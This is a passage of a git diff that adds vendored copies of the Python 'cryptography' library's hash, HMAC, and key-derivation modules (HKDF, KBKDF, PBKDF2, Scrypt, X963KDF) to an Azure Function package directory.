verify(self, signature: bytes) -> None: + utils._check_bytes("signature", signature) + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + + ctx, self._ctx = self._ctx, None + ctx.verify(signature) + + def copy(self) -> "CMAC": + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + return CMAC(self._algorithm, ctx=self._ctx.copy()) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/constant_time.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/constant_time.py new file mode 100644 index 0000000..3577ddb --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/constant_time.py @@ -0,0 +1,13 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import hmac + + +def bytes_eq(a: bytes, b: bytes) -> bool: + if not isinstance(a, bytes) or not isinstance(b, bytes): + raise TypeError("a and b must be bytes.") + + return hmac.compare_digest(a, b) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/hashes.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/hashes.py new file mode 100644 index 0000000..9dbdf2f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/hashes.py @@ -0,0 +1,259 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import abc +import typing + +from cryptography import utils +from cryptography.exceptions import ( + AlreadyFinalized, +) + + +class HashAlgorithm(metaclass=abc.ABCMeta): + @abc.abstractproperty + def name(self) -> str: + """ + A string naming this algorithm (e.g. "sha256", "md5"). + """ + + @abc.abstractproperty + def digest_size(self) -> int: + """ + The size of the resulting digest in bytes. + """ + + @abc.abstractproperty + def block_size(self) -> typing.Optional[int]: + """ + The internal block size of the hash function, or None if the hash + function does not use blocks internally (e.g. SHA3). + """ + + +class HashContext(metaclass=abc.ABCMeta): + @abc.abstractproperty + def algorithm(self) -> HashAlgorithm: + """ + A HashAlgorithm that will be used by this context. + """ + + @abc.abstractmethod + def update(self, data: bytes) -> None: + """ + Processes the provided bytes through the hash. + """ + + @abc.abstractmethod + def finalize(self) -> bytes: + """ + Finalizes the hash context and returns the hash digest as bytes. + """ + + @abc.abstractmethod + def copy(self) -> "HashContext": + """ + Return a HashContext that is a copy of the current context. + """ + + +class ExtendableOutputFunction(metaclass=abc.ABCMeta): + """ + An interface for extendable output functions. + """ + + +class Hash(HashContext): + _ctx: typing.Optional[HashContext] + + def __init__( + self, + algorithm: HashAlgorithm, + backend: typing.Any = None, + ctx: typing.Optional["HashContext"] = None, + ): + if not isinstance(algorithm, HashAlgorithm): + raise TypeError("Expected instance of hashes.HashAlgorithm.") + self._algorithm = algorithm + + if ctx is None: + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + self._ctx = ossl.create_hash_ctx(self.algorithm) + else: + self._ctx = ctx + + @property + def algorithm(self) -> HashAlgorithm: + return self._algorithm + + def update(self, data: bytes) -> None: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + utils._check_byteslike("data", data) + self._ctx.update(data) + + def copy(self) -> "Hash": + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + return Hash(self.algorithm, ctx=self._ctx.copy()) + + def finalize(self) -> bytes: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + digest = self._ctx.finalize() + self._ctx = None + return digest + + +class SHA1(HashAlgorithm): + name = "sha1" + digest_size = 20 + block_size = 64 + + +class SHA512_224(HashAlgorithm): # noqa: N801 + name = "sha512-224" + digest_size = 28 + block_size = 128 + + +class SHA512_256(HashAlgorithm): # noqa: N801 + name = "sha512-256" + digest_size = 32 + block_size = 128 + + +class SHA224(HashAlgorithm): + name = "sha224" + digest_size = 28 + block_size = 64 + + +class SHA256(HashAlgorithm): + name = "sha256" + digest_size = 32 + block_size = 64 + + +class SHA384(HashAlgorithm): + name = "sha384" + digest_size = 48 + block_size = 128 + + +class SHA512(HashAlgorithm): + name = "sha512" + digest_size = 64 + block_size = 128 + + +class SHA3_224(HashAlgorithm): # noqa: N801 + name = "sha3-224" + digest_size = 28 + block_size = None + + +class SHA3_256(HashAlgorithm): # noqa: N801 + name = "sha3-256" + digest_size = 32 + block_size = None + + +class SHA3_384(HashAlgorithm): # noqa: N801 + name = "sha3-384" + digest_size = 48 + block_size = None + + +class SHA3_512(HashAlgorithm): # noqa: N801 + name = "sha3-512" + digest_size = 64 + block_size = None + + +class SHAKE128(HashAlgorithm, ExtendableOutputFunction): + name = "shake128" + block_size = None + + def __init__(self, digest_size: int): + if not isinstance(digest_size, int): + raise TypeError("digest_size must be an integer") + + if digest_size < 1: + raise ValueError("digest_size must be a positive integer") + + self._digest_size = digest_size + + @property + def digest_size(self) -> int: + return self._digest_size + + +class SHAKE256(HashAlgorithm, ExtendableOutputFunction): + name = "shake256" + block_size = None + + def __init__(self, digest_size: int): + if not isinstance(digest_size, int): + raise TypeError("digest_size must be an integer") + + if digest_size < 1: + raise ValueError("digest_size must be a positive integer") + + self._digest_size = digest_size + + @property + def digest_size(self) -> int: + return self._digest_size + + +class MD5(HashAlgorithm): + name = "md5" + digest_size = 16 + block_size = 64 + + +class BLAKE2b(HashAlgorithm): + name = "blake2b" + _max_digest_size = 64 + _min_digest_size = 1 + block_size = 128 + + def __init__(self, digest_size: int): + + if digest_size != 64: + raise ValueError("Digest size must be 64") + + self._digest_size = digest_size + + @property + def digest_size(self) -> int: + return self._digest_size + + +class BLAKE2s(HashAlgorithm): + name = "blake2s" + block_size = 64 + _max_digest_size = 32 + _min_digest_size = 1 + + def __init__(self, digest_size: int): + + if digest_size != 32: + raise ValueError("Digest size must be 32") + + self._digest_size = digest_size + + @property + def digest_size(self) -> int: + return self._digest_size + + +class SM3(HashAlgorithm): + name = "sm3" + digest_size = 32 + block_size = 64 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/hmac.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/hmac.py new file mode 100644 index 0000000..4b71f3e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/hmac.py @@ -0,0 +1,72 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import typing + +from cryptography import utils +from cryptography.exceptions import ( + AlreadyFinalized, +) +from cryptography.hazmat.backends.openssl.hmac import _HMACContext +from cryptography.hazmat.primitives import hashes + + +class HMAC(hashes.HashContext): + _ctx: typing.Optional[_HMACContext] + + def __init__( + self, + key: bytes, + algorithm: hashes.HashAlgorithm, + backend: typing.Any = None, + ctx=None, + ): + if not isinstance(algorithm, hashes.HashAlgorithm): + raise TypeError("Expected instance of hashes.HashAlgorithm.") + self._algorithm = algorithm + + self._key = key + if ctx is None: + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + self._ctx = ossl.create_hmac_ctx(key, self.algorithm) + else: + self._ctx = ctx + + @property + def algorithm(self) -> hashes.HashAlgorithm: + return self._algorithm + + def update(self, data: bytes) -> None: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + utils._check_byteslike("data", data) + self._ctx.update(data) + + def copy(self) -> "HMAC": + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + return HMAC( + self._key, + self.algorithm, + ctx=self._ctx.copy(), + ) + + def finalize(self) -> bytes: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + digest = self._ctx.finalize() + self._ctx = None + return digest + + def verify(self, signature: bytes) -> None: + utils._check_bytes("signature", signature) + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + + ctx, self._ctx = self._ctx, None + ctx.verify(signature) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__init__.py new file mode 100644 index 0000000..8e1270a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__init__.py @@ -0,0 +1,22 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc + + +class KeyDerivationFunction(metaclass=abc.ABCMeta): + @abc.abstractmethod + def derive(self, key_material: bytes) -> bytes: + """ + Deterministically generates and returns a new key based on the existing + key material. + """ + + @abc.abstractmethod + def verify(self, key_material: bytes, expected_key: bytes) -> None: + """ + Checks whether the key generated by the key material matches the + expected derived key. Raises an exception if they do not match. + """ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..a5a01d6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/concatkdf.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/concatkdf.cpython-39.pyc new file mode 100644 index 0000000..7b94f5f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/concatkdf.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/hkdf.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/hkdf.cpython-39.pyc new file mode 100644 index 0000000..5565032 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/hkdf.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/kbkdf.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/kbkdf.cpython-39.pyc new file mode 100644 index 0000000..f122845 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/kbkdf.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/pbkdf2.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/pbkdf2.cpython-39.pyc new file mode 100644 index 0000000..036e270 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/pbkdf2.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/scrypt.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/scrypt.cpython-39.pyc new file mode 100644 index 0000000..078cd31 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/scrypt.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/x963kdf.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/x963kdf.cpython-39.pyc new file mode 100644 index 0000000..6b35ce0 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/x963kdf.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/concatkdf.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/concatkdf.py new file mode 100644 index 0000000..03ed5cf --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/concatkdf.py @@ -0,0 +1,130 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import typing + +from cryptography import utils +from cryptography.exceptions import ( + AlreadyFinalized, + InvalidKey, +) +from cryptography.hazmat.primitives import constant_time, hashes, hmac +from cryptography.hazmat.primitives.kdf import KeyDerivationFunction + + +def _int_to_u32be(n: int) -> bytes: + return n.to_bytes(length=4, byteorder="big") + + +def _common_args_checks( + algorithm: hashes.HashAlgorithm, + length: int, + otherinfo: typing.Optional[bytes], +) -> None: + max_length = algorithm.digest_size * (2**32 - 1) + if length > max_length: + raise ValueError( + "Cannot derive keys larger than {} bits.".format(max_length) + ) + if otherinfo is not None: + utils._check_bytes("otherinfo", otherinfo) + + +def _concatkdf_derive( + key_material: bytes, + length: int, + auxfn: typing.Callable[[], hashes.HashContext], + otherinfo: bytes, +) -> bytes: + utils._check_byteslike("key_material", key_material) + output = [b""] + outlen = 0 + counter = 1 + + while length > outlen: + h = auxfn() + h.update(_int_to_u32be(counter)) + h.update(key_material) + h.update(otherinfo) + output.append(h.finalize()) + outlen += len(output[-1]) + counter += 1 + + return b"".join(output)[:length] + + +class ConcatKDFHash(KeyDerivationFunction): + def __init__( + self, + algorithm: hashes.HashAlgorithm, + length: int, + otherinfo: typing.Optional[bytes], + backend: typing.Any = None, + ): + _common_args_checks(algorithm, length, otherinfo) + self._algorithm = algorithm + self._length = length + self._otherinfo: bytes = otherinfo if otherinfo is not None else b"" + + self._used = False + + def _hash(self) -> hashes.Hash: + return hashes.Hash(self._algorithm) + + def derive(self, key_material: bytes) -> bytes: + if self._used: + raise AlreadyFinalized + self._used = True + return _concatkdf_derive( + key_material, self._length, self._hash, self._otherinfo + ) + + def verify(self, key_material: bytes, expected_key: bytes) -> None: + if not constant_time.bytes_eq(self.derive(key_material), expected_key): + raise InvalidKey + + +class ConcatKDFHMAC(KeyDerivationFunction): + def __init__( + self, + algorithm: hashes.HashAlgorithm, + length: int, + salt: typing.Optional[bytes], + otherinfo: typing.Optional[bytes], + backend: typing.Any = None, + ): + _common_args_checks(algorithm, length, otherinfo) + self._algorithm = algorithm + self._length = length + self._otherinfo: bytes = otherinfo if otherinfo is not None else b"" + + if algorithm.block_size is None: + raise TypeError( + "{} is unsupported for ConcatKDF".format(algorithm.name) + ) + + if salt is None: + salt = b"\x00" * algorithm.block_size + else: + utils._check_bytes("salt", salt) + + self._salt = salt + + self._used = False + + def _hmac(self) -> hmac.HMAC: + return hmac.HMAC(self._salt, self._algorithm) + + def derive(self, key_material: bytes) -> bytes: + if self._used: + raise AlreadyFinalized + self._used = True + return _concatkdf_derive( + key_material, self._length, self._hmac, self._otherinfo + ) + + def verify(self, key_material: bytes, expected_key: bytes) -> None: + if not constant_time.bytes_eq(self.derive(key_material), expected_key): + raise InvalidKey diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/hkdf.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/hkdf.py new file mode 100644 index 0000000..d25f0e7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/hkdf.py @@ -0,0 +1,103 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import typing + +from cryptography import utils +from cryptography.exceptions import ( + AlreadyFinalized, + InvalidKey, +) +from cryptography.hazmat.primitives import constant_time, hashes, hmac +from cryptography.hazmat.primitives.kdf import KeyDerivationFunction + + +class HKDF(KeyDerivationFunction): + def __init__( + self, + algorithm: hashes.HashAlgorithm, + length: int, + salt: typing.Optional[bytes], + info: typing.Optional[bytes], + backend: typing.Any = None, + ): + self._algorithm = algorithm + + if salt is None: + salt = b"\x00" * self._algorithm.digest_size + else: + utils._check_bytes("salt", salt) + + self._salt = salt + + self._hkdf_expand = HKDFExpand(self._algorithm, length, info) + + def _extract(self, key_material: bytes) -> bytes: + h = hmac.HMAC(self._salt, self._algorithm) + h.update(key_material) + return h.finalize() + + def derive(self, key_material: bytes) -> bytes: + utils._check_byteslike("key_material", key_material) + return self._hkdf_expand.derive(self._extract(key_material)) + + def verify(self, key_material: bytes, expected_key: bytes) -> None: + if not constant_time.bytes_eq(self.derive(key_material), expected_key): + raise InvalidKey + + +class HKDFExpand(KeyDerivationFunction): + def __init__( + self, + algorithm: hashes.HashAlgorithm, + length: int, + info: typing.Optional[bytes], + backend: typing.Any = None, + ): + self._algorithm = algorithm + + max_length = 255 * algorithm.digest_size + + if length > max_length: + raise ValueError( + "Cannot derive keys larger than {} octets.".format(max_length) + ) + + self._length = length + + if info is None: + info = b"" + else: + utils._check_bytes("info", info) + + self._info = info + + self._used = False + + def _expand(self, key_material: bytes) -> bytes: + output = [b""] + counter = 1 + + while self._algorithm.digest_size * (len(output) - 1) < self._length: + h = hmac.HMAC(key_material, self._algorithm) + h.update(output[-1]) + h.update(self._info) + h.update(bytes([counter])) + output.append(h.finalize()) + counter += 1 + + return b"".join(output)[: self._length] + + def derive(self, key_material: bytes) -> bytes: + utils._check_byteslike("key_material", key_material) + if self._used: + raise AlreadyFinalized + + self._used = True + return self._expand(key_material) + + def verify(self, key_material: bytes, expected_key: bytes) -> None: + if not constant_time.bytes_eq(self.derive(key_material), expected_key): + raise InvalidKey diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/kbkdf.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/kbkdf.py new file mode 100644 index 0000000..b84c2ab --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/kbkdf.py @@ -0,0 +1,258 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography import utils +from cryptography.exceptions import ( + AlreadyFinalized, + InvalidKey, + UnsupportedAlgorithm, + _Reasons, +) +from cryptography.hazmat.primitives import ( + ciphers, + cmac, + constant_time, + hashes, + hmac, +) +from cryptography.hazmat.primitives.kdf import KeyDerivationFunction + + +class Mode(utils.Enum): + CounterMode = "ctr" + + +class CounterLocation(utils.Enum): + BeforeFixed = "before_fixed" + AfterFixed = "after_fixed" + + +class _KBKDFDeriver: + def __init__( + self, + prf: typing.Callable, + mode: Mode, + length: int, + rlen: int, + llen: typing.Optional[int], + location: CounterLocation, + label: typing.Optional[bytes], + context: typing.Optional[bytes], + fixed: typing.Optional[bytes], + ): + assert callable(prf) + + if not isinstance(mode, Mode): + raise TypeError("mode must be of type Mode") + + if not isinstance(location, CounterLocation): + raise TypeError("location must be of type CounterLocation") + + if (label or context) and fixed: + raise ValueError( + "When supplying fixed data, " "label and context are ignored." + ) + + if rlen is None or not self._valid_byte_length(rlen): + raise ValueError("rlen must be between 1 and 4") + + if llen is None and fixed is None: + raise ValueError("Please specify an llen") + + if llen is not None and not isinstance(llen, int): + raise TypeError("llen must be an integer") + + if label is None: + label = b"" + + if context is None: + context = b"" + + utils._check_bytes("label", label) + utils._check_bytes("context", context) + self._prf = prf + self._mode = mode + self._length = length + self._rlen = rlen + self._llen = llen + self._location = location + self._label = label + self._context = context + self._used = False + self._fixed_data = fixed + + @staticmethod + def _valid_byte_length(value: int) -> bool: + if not isinstance(value, int): + raise TypeError("value must be of type int") + + value_bin = utils.int_to_bytes(1, value) + if not 1 <= len(value_bin) <= 4: + return False + return True + + def derive(self, key_material: bytes, prf_output_size: int) -> bytes: + if self._used: + raise AlreadyFinalized + + utils._check_byteslike("key_material", key_material) + self._used = True + + # inverse floor division (equivalent to ceiling) + rounds = -(-self._length // prf_output_size) + + output = [b""] + + # For counter mode, the number of iterations shall not be + # larger than 2^r-1, where r <= 32 is the binary length of the counter + # This ensures that the counter values used as an input to the + # PRF will not repeat during a particular call to the KDF function. + r_bin = utils.int_to_bytes(1, self._rlen) + if rounds > pow(2, len(r_bin) * 8) - 1: + raise ValueError("There are too many iterations.") + + for i in range(1, rounds + 1): + h = self._prf(key_material) + + counter = utils.int_to_bytes(i, self._rlen) + if self._location == CounterLocation.BeforeFixed: + h.update(counter) + + h.update(self._generate_fixed_input()) + + if self._location == CounterLocation.AfterFixed: + h.update(counter) + + output.append(h.finalize()) + + return b"".join(output)[: self._length] + + def _generate_fixed_input(self) -> bytes: + if self._fixed_data and isinstance(self._fixed_data, bytes): + return self._fixed_data + + l_val = utils.int_to_bytes(self._length * 8, self._llen) + + return b"".join([self._label, b"\x00", self._context, l_val]) + + +class KBKDFHMAC(KeyDerivationFunction): + def __init__( + self, + algorithm: hashes.HashAlgorithm, + mode: Mode, + length: int, + rlen: int, + llen: typing.Optional[int], + location: CounterLocation, + label: typing.Optional[bytes], + context: typing.Optional[bytes], + fixed: typing.Optional[bytes], + backend: typing.Any = None, + ): + if not isinstance(algorithm, hashes.HashAlgorithm): + raise UnsupportedAlgorithm( + "Algorithm supplied is not a supported hash algorithm.", + _Reasons.UNSUPPORTED_HASH, + ) + + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + if not ossl.hmac_supported(algorithm): + raise UnsupportedAlgorithm( + "Algorithm supplied is not a supported hmac algorithm.", + _Reasons.UNSUPPORTED_HASH, + ) + + self._algorithm = algorithm + + self._deriver = _KBKDFDeriver( + self._prf, + mode, + length, + rlen, + llen, + location, + label, + context, + fixed, + ) + + def _prf(self, key_material: bytes) -> hmac.HMAC: + return hmac.HMAC(key_material, self._algorithm) + + def derive(self, key_material: bytes) -> bytes: + return self._deriver.derive(key_material, self._algorithm.digest_size) + + def verify(self, key_material: bytes, expected_key: bytes) -> None: + if not constant_time.bytes_eq(self.derive(key_material), expected_key): + raise InvalidKey + + +class KBKDFCMAC(KeyDerivationFunction): + def __init__( + self, + algorithm, + mode: Mode, + length: int, + rlen: int, + llen: typing.Optional[int], + location: CounterLocation, + label: typing.Optional[bytes], + context: typing.Optional[bytes], + fixed: typing.Optional[bytes], + backend: typing.Any = None, + ): + if not issubclass( + algorithm, ciphers.BlockCipherAlgorithm + ) or not issubclass(algorithm, ciphers.CipherAlgorithm): + raise UnsupportedAlgorithm( + "Algorithm supplied is not a supported cipher algorithm.", + _Reasons.UNSUPPORTED_CIPHER, + ) + + self._algorithm = algorithm + self._cipher: typing.Optional[ciphers.BlockCipherAlgorithm] = None + + self._deriver = _KBKDFDeriver( + self._prf, + mode, + length, + rlen, + llen, + location, + label, + context, + fixed, + ) + + def _prf(self, _: bytes) -> cmac.CMAC: + assert self._cipher is not None + + return cmac.CMAC(self._cipher) + + def derive(self, key_material: bytes) -> bytes: + self._cipher = self._algorithm(key_material) + + assert self._cipher is not None + + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + if not ossl.cmac_algorithm_supported(self._cipher): + raise UnsupportedAlgorithm( + "Algorithm supplied is not a supported cipher algorithm.", + _Reasons.UNSUPPORTED_CIPHER, + ) + + return self._deriver.derive(key_material, self._cipher.block_size // 8) + + def verify(self, key_material: bytes, expected_key: bytes) -> None: + if not constant_time.bytes_eq(self.derive(key_material), expected_key): + raise InvalidKey diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/pbkdf2.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/pbkdf2.py new file mode 100644 index 0000000..a2b9392 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/pbkdf2.py @@ -0,0 +1,65 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import typing + +from cryptography import utils +from cryptography.exceptions import ( + AlreadyFinalized, + InvalidKey, + UnsupportedAlgorithm, + _Reasons, +) +from cryptography.hazmat.primitives import constant_time, hashes +from cryptography.hazmat.primitives.kdf import KeyDerivationFunction + + +class PBKDF2HMAC(KeyDerivationFunction): + def __init__( + self, + algorithm: hashes.HashAlgorithm, + length: int, + salt: bytes, + iterations: int, + backend: typing.Any = None, + ): + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + if not ossl.pbkdf2_hmac_supported(algorithm): + raise UnsupportedAlgorithm( + "{} is not supported for PBKDF2 by this backend.".format( + algorithm.name + ), + _Reasons.UNSUPPORTED_HASH, + ) + self._used = False + self._algorithm = algorithm + self._length = length + utils._check_bytes("salt", salt) + self._salt = salt + self._iterations = iterations + + def derive(self, key_material: bytes) -> bytes: + if self._used: + raise AlreadyFinalized("PBKDF2 instances can only be used once.") + self._used = True + + utils._check_byteslike("key_material", key_material) + from cryptography.hazmat.backends.openssl.backend import backend + + return backend.derive_pbkdf2_hmac( + self._algorithm, + self._length, + self._salt, + self._iterations, + key_material, + ) + + def verify(self, key_material: bytes, expected_key: bytes) -> None: + derived_key = self.derive(key_material) + if not constant_time.bytes_eq(derived_key, expected_key): + raise InvalidKey("Keys do not match.") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/scrypt.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/scrypt.py new file mode 100644 index 0000000..fc2a131 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/scrypt.py @@ -0,0 +1,74 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import sys +import typing + +from cryptography import utils +from cryptography.exceptions import ( + AlreadyFinalized, + InvalidKey, + UnsupportedAlgorithm, +) +from cryptography.hazmat.primitives import constant_time +from cryptography.hazmat.primitives.kdf import KeyDerivationFunction + + +# This is used by the scrypt tests to skip tests that require more memory +# than the MEM_LIMIT +_MEM_LIMIT = sys.maxsize // 2 + + +class Scrypt(KeyDerivationFunction): + def __init__( + self, + salt: bytes, + length: int, + n: int, + r: int, + p: int, + backend: typing.Any = None, + ): + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + if not ossl.scrypt_supported(): + raise UnsupportedAlgorithm( + "This version of OpenSSL does not support scrypt" + ) + self._length = length + utils._check_bytes("salt", salt) + if n < 2 or (n & (n - 1)) != 0: + raise ValueError("n must be greater than 1 and be a power of 2.") + + if r < 1: + raise ValueError("r must be greater than or equal to 1.") + + if p < 1: + raise ValueError("p must be greater than or equal to 1.") + + self._used = False + self._salt = salt + self._n = n + self._r = r + self._p = p + + def derive(self, key_material: bytes) -> bytes: + if self._used: + raise AlreadyFinalized("Scrypt instances can only be used once.") + self._used = True + + utils._check_byteslike("key_material", key_material) + from cryptography.hazmat.backends.openssl.backend import backend + + return backend.derive_scrypt( + key_material, self._salt, self._length, self._n, self._r, self._p + ) + + def verify(self, key_material: bytes, expected_key: bytes) -> None: + derived_key = self.derive(key_material) + if not constant_time.bytes_eq(derived_key, expected_key): + raise InvalidKey("Keys do not match.") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/x963kdf.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/x963kdf.py new file mode 100644 index 0000000..1438d45 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/x963kdf.py @@ -0,0 +1,65 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import typing + +from cryptography import utils +from cryptography.exceptions import ( + AlreadyFinalized, + InvalidKey, +) +from cryptography.hazmat.primitives import constant_time, hashes +from cryptography.hazmat.primitives.kdf import KeyDerivationFunction + + +def _int_to_u32be(n: int) -> bytes: + return n.to_bytes(length=4, byteorder="big") + + +class X963KDF(KeyDerivationFunction): + def __init__( + self, + algorithm: hashes.HashAlgorithm, + length: int, + sharedinfo: typing.Optional[bytes], + backend: typing.Any = None, + ): + max_len = algorithm.digest_size * (2**32 - 1) + if length > max_len: + raise ValueError( + "Cannot derive keys larger than {} bits.".format(max_len) + ) + if sharedinfo is not None: + utils._check_bytes("sharedinfo", sharedinfo) + + self._algorithm = algorithm + self._length = length + self._sharedinfo = sharedinfo + self._used = False + + def derive(self, key_material: bytes) -> bytes: + if self._used: + raise AlreadyFinalized + self._used = True + utils._check_byteslike("key_material", key_material) + output = [b""] + outlen = 0 + counter = 1 + + while self._length > outlen: + h = hashes.Hash(self._algorithm) + h.update(key_material) + h.update(_int_to_u32be(counter)) + if self._sharedinfo is not None: + h.update(self._sharedinfo) + output.append(h.finalize()) + outlen += len(output[-1]) + counter += 1 + + return b"".join(output)[: self._length] + + def 